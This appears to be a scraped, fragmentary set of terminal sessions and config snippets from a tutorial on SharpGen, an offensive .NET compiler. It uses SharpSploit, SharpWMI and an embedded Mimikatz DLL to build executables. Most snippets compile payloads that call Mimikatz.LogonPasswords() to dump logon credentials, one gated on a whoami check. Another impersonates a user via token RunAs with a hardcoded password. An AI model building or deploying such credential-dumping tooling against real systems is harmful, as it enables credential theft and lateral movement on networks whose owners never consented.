cobbr

cobbr@mac:~/SharpGen > dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --platform x64 "Console.WriteLine(Mimikatz.LogonPasswords());"

cobbr

- Name: SharpSploit.Resources.powerkatz_x86.dll
  File: powerkatz_x86.dll
  Platform: x86
  Enabled: false
- Name: SharpSploit.Resources.powerkatz_x64.dll
  File: powerkatz_x64.dll
  Platform: x64
  Enabled: false

cobbr

- File: System.Management.Automation.dll
  Framework: Net35
  Enabled: false

cobbr

cobbr@mac:~/SharpGen > cp -r ~/GhostPack/SharpWMI/SharpWMI ./Source
cobbr@mac:~/SharpGen > cat example.txt
SharpWMI.Program.LocalWMIQuery("select * from win32_service");
Console.WriteLine(Host.GetProcessList());
cobbr@mac:~/SharpGen > dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --source-file example.txt
...
[*] Compiled assembly written to: /Users/cobbr/SharpGen/Output/example.exe

cobbr

--> SharpGen
  |---> Source              // Generated binaries will be compiled against all source code under this directory
      |---> SharpSploit             // SharpSploit source code
  |---> References          // Generated binaries will references DLLs listed under this directory during compilation
      |---> references.yml          // References configuration file that directs SharpGen on which DLLs to reference during compilation
      |---> net35                   // Directory for .NET Framework 3.5 references DLLs
      |---> net40                   // Directory for .NET Framework 4.0 references DLLs
  |---> Resources           // Generated binaries will embed resources under this directory during compilation
      |---> resources.yml           // Resources configuration file that directs SharpGen on which resources to embed in generated binaries
      |---> powerkatz_x64.dll       // Mimikatz 64-bit dll

cobbr

cobbr@mac:~/SharpGen > dotnet bin/Debug/netcoreapp2.1/SharpGen.dll -h
Usage:  [options]
Options:
  -? | -h | --help                                     Show help information
  -f | --file <OUTPUT_FILE>                            The output file to write to.
  -d | --dotnet | --dotnet-framework <DOTNET_VERSION>  The Dotnet Framework version to target (net35 or net40).
  -o | --output-kind <OUTPUT_KIND>                     The OutputKind to use (console or dll).
  -p | --platform <PLATFORM>                           The Platform to use (AnyCpy, x86, or x64).
  -n | --no-optimization                               Don't use source code optimization.
  -a | --assembly-name <ASSEMBLY_NAME>                 The name of the assembly to be generated.

cobbr

cobbr@mac:~/SharpGen > cat example.txt
using System;
using SharpSploit.Execution;
using SharpSploit.Credentials;
class Program
{
    static void Main()
    {
        string whoami = Shell.ShellExecute("whoami");
        if (whoami == "SomeUser")

cobbr

cobbr@mac:~/SharpGen > cat example.txt
string whoami = Shell.ShellExecute("whoami");
if (whoami == "SomeUser")
{
    Console.WriteLine(Mimikatz.LogonPasswords());
}
cobbr@mac:~/SharpGen > dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --source-file example.txt
...
[*] Compiled assembly written to: /Users/cobbr/SharpGen/Output/example.exe

cobbr

cobbr@mac:~/SharpGen > dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe "Console.WriteLine(Mimikatz.LogonPasswords());"
[+] Compiling source:
using System;
using System.IO;
using System.Text;
using System.Linq;
using System.Security.Principal;
using System.Collections.Generic;
using SharpSploit.Credentials;
using SharpSploit.Enumeration;

cobbr

using SharpSploit.Credentials;
public class Program {
    static void Main() {
        using (Tokens t = new Tokens())
        {
            string whoami = t.RunAs("Username", ".", "Password123!", ()=>
            {
                return t.WhoAmI();
            });
        }